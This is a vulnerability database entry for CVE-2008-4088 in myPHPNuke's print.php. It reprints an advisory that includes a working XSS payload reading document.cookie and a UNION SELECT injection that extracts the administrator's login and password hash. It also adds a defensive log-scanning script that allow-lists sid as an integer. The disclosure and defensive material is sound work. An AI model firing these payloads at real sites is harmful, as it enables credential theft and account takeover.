myPHPNuke 'print.php' SQL Injection Vulnerability

Vulnerability ID: 1115993
Vulnerability type: SQL injection
Published: 2008-08-31
Updated: 2009-01-29
CVE ID: CVE-2008-4088
CNNVD-ID: CNNVD-200809-201
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/6338
https://cxsecurity.com/issue/WLB-2008090125
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-201
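|Vulnerability details
myPHPNuke is an open-source site content-building system. A SQL injection vulnerability exists in print.php in myPHPNuke (MPN) versions before 1.8.8_8rc2. A remote attacker can execute arbitrary SQL commands via the sid parameter.
|Vulnerability EXP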
############################################################

Cross-Site Scripting and SQL Injection vulnerabilities in myPHPNuke

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2391/

Description: There are Cross-Site Scripting and SQL Injection vulnerabilities in print.php in myPHPNuke.

XSS:

http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1

With this query you will receive the login and password (hash) of the administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In the last version, additional filters were added, so it is not vulnerable to these XSS and SQL Injection attacks. But version 1.8.8_8rc2 is still vulnerable to SQL Injection, and so a limited SQL Injection attack is possible (without using spaces and brackets).

############################################################ 

# milw0rm.com [2008-08-31]
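
The advisory notes that the character filters added in 1.8.8_8rc2 still left a limited injection, so a defender-side check is more reliable when it allow-lists sid as a plain integer instead of looking for particular characters. The following is an added example, not part of the advisory or of myPHPNuke: it scans web access logs for print.php requests whose sid fails that allow-list. The log lines are constructed and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic); the second and third
# requests reuse the request strings quoted in the advisory above.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Sep/2008:10:00:01 +0000] "GET /print.php?sid=42 HTTP/1.1" 200 5120
198.51.100.8 - - [01/Sep/2008:10:00:05 +0000] "GET /print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1 HTTP/1.1" 200 811
198.51.100.9 - - [01/Sep/2008:10:00:09 +0000] "GET /print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E HTTP/1.1" 200 640
198.51.100.10 - - [01/Sep/2008:10:00:12 +0000] "GET /print.php?sid=12abc HTTP/1.1" 200 640
198.51.100.3 - - [01/Sep/2008:10:00:20 +0000] "GET /article.php?sid=abc HTTP/1.1" 200 300
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SID_RE = re.compile(r"[0-9]{1,10}")  # allow-list: decimal digits only

def sid_is_valid(value):
    """True only for a plain non-negative integer, the only form an article id needs."""
    return SID_RE.fullmatch(value) is not None

def suspicious_print_requests(log_text):
    """Return (client, decoded_sid) for print.php requests whose sid fails the allow-list."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/print.php"):
            continue
        # parse_qs percent-decodes values; keep blanks so an empty "sid=" is reported too
        for value in parse_qs(url.query, keep_blank_values=True).get("sid", []):
            if not sid_is_valid(value):
                hits.append((client, value))
    return hits

if __name__ == "__main__":
    for client, sid in suspicious_print_requests(SAMPLE_LOG):
        print(f"{client}\tnon-integer sid: {sid!r}")
```

The same integer allow-list, applied server-side before sid reaches the query or the page output, rejects both request strings from the advisory without relying on a character filter.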
|References

Source: XF
Name: myphpnuke-print-sql-injection(45084)
Link: http://xforce.iss.net/xforce/xfdb/45084
Source: BID
Name: 31114
Link: http://www.securityfocus.com/bid/31114
Source: BID
Name: 31112
Link: http://www.securityfocus.com/bid/31112
Source: BID
Name: 30942
Link: http://www.securityfocus.com/bid/30942
Source: MILW0RM
Name: 6338
Link: http://www.milw0rm.com/exploits/6338
Source: SREASON
Name: 4255
Link: http://securityreason.com/securityalert/4255